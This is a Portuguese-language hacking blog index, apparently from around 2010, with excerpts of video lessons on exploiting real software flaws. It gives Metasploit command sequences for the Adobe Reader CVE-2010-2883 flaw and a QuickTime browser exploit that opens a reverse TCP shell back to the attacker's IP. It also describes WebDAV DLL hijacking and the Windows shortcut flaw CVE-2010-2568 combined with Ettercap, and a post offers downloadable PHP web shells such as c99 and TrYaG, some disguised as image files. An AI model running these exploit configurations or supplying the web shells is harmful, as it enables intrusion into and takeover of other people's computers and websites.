Blog do whit3_sh4rk (WeSk)

WeSk é uma espécie de blog que traz conteúdos sobre informática de forma dinâmica e descontraída. O objetivo é distribuir e adquirir conhecimento através de conteúdos desenvolvidos pelo próprio autor da página (whit3_sh4rk), pesquisas e através de contribuições dos leitores e parceiros.A página contém textos sobre Windows/Windows Server, Linux, Programação, entre outros assuntos. Algumas ferramentas e em alguns casos seus respectivos códigos-fonte...

Vulnerabilidade no Adobe Reader 9.3.4(0day)

Mais uma vulnerabilidade no Adobe reader (CVE-2010-2883), dessa vez do tipo 0day. Olhando os novos exploits apos uma atualização do metasploit, encontrei esse e resolvi fazer uma aula, a versão do adobe usada na aula foi a 9.3.4 ultima versão disponível e o sistema operacional alvo "Windows 7" mas funciona em versões anteriores. Mas uma vez o Metasploit na frente de seus concorrentes... :PComandos:use exploit/windows/fileformat/adobe_cooltype_singset...

Metasploit - Vulnerabilidade no QuickTime 7.6.7 (0day)

Nessa aula mostro como explorar a vulnerabilidade no QuickTime, essa vulnerabilidade e classificada de 0day e afeta todas as versões do QuickTime e do Windows. Ela foi descoberta pelo Investigador de segurança Ruben Santamarta.Comandos:use exploit/windows/browser/apple_quicktime_marshaled_punkset SRVHOST SeuIPset SRVPORT 80set URIPATH /set payload windows/shell/reverse_tcpset LHOST SeuIPset LPORT 5050exploitSobre o Vídeo: Formato:  AVITamanho:...

Fórum Underground

O Fórum Underground é um espaço novo sobre assuntos avançados de informática, onde a admissão é restringido a critérios de seleção e de conhecimento na área de TI.O fórum não se encontra aberto para consulta e leitura de artigos sem registo e aceitação por parte da atual Administração do mesmo.Quem faz parte da nossa comunidade tem à sua disposição artigos avançados sobre segurança em redes, linguagem de programação, material de estudo e de apoio...

SET + Metasploit - WebDAV DLL hijacker

Nessa aula mostro com explorar WebDAV DLL hijack usando o SET integrado com Metasploit.Sobre o Vídeo:Formato:  AVITamanho: 12.5 MBDuração: 3:12 minMusica: Toca uma regueira aí - ArmandinhoBaixar: http://www.4shared.com/file/X6cJru8-/SET-DLL_Hijacker.htmlRef: http://blog.zoller.lu/2010/08/cve-2010-xn-loadlibrarygetprocaddress.htmlhttp://www.acrossecurity.com/aspr/ASPR-2010-08-18-1-PUB....

Reverse Egineering Brazil

Encontre dicas, artigos, ferramentas, desafios, e-books, unpacking, keygenning, vídeos tutorias e muitomais coisas relacionadas a Engenharia Reversa, como também análise de malwares e programação voltada para RE.Reverse Egineering Brazil é um novo conceito de um lugar sério para estudos sobre RE, juntos aprendemose juntos ensinamos, tudo que é necessário para se dar largada nesse mundo de RE.Fórum: http://www.re-b.net/home/index.phpunn4 (Admin):...

Metasploit - Mudando o Banner

Vídeo aula simples de como trocar o banner do metasploit, a aula foi feita a pedido de um usuario do blog. Qualquer duvida reporte abaixo.Baixar: http://www.4shared.com/file/Yp_AdMBB/Mudando_banner.html...

Vulnerabilidade de atalho do Windows - CVE-2010-2568 - Metasploit + Ettercap

Vulnerabilidade de atalho nos sistemas operacionais Windows das versões Windows XP SP2 e SP3, Server 2003 SP2, Vista SP1 e SP2, Server 2008 SP2 e R2, e Windows 7, que permite a execução de códigos maliciosos através dos arquivos de atalho fabiano.LNK ou fabiano.PIF que e direcionado para um DLL malicioso.Maiores informações em:http://www.microsoft.com/technet/security/bulletin/MS10-046.mspxhttp://www.microsoft.com/technet/security/advisory/2286198.mspxO que eu fiz?Usei o metasploit para preparar o ataque fazendo um servidor e o ettercap fazendo...

Lanmap

O lanmap é um software que observa silenciosamente a rede e produz um mapa com os dados que obtém desta rede. O autor do software queria algo que demonstrasse claramente como as redes estavam configuradas. Obter estes dados com sniffers como o tcpdump não era prático, o que motivou-o a desenvolver o lanmap.Ele “escuta” todo o tráfego disponível na rede, observa quais computadores estão comunicando-se com os outros, qual é o volume deste tráfego e...

Shell script php

Alguns shell scripts em php, divirtam-se.Nomes:120667kk.php.pjpeg420532Shell.php.pjpeg629788tryag.php681985c99.php951078biJ.phpc99.phpjoomla.phpmm.phpMohajer22-perl.plO0O.phpperl.plsql.phpstyle.phpsym4.phpTeam SQL.phpTrYaG.phpupdate.phpBaixar: http://www.4shared.com/file/uDgWw-cG/scripts.h...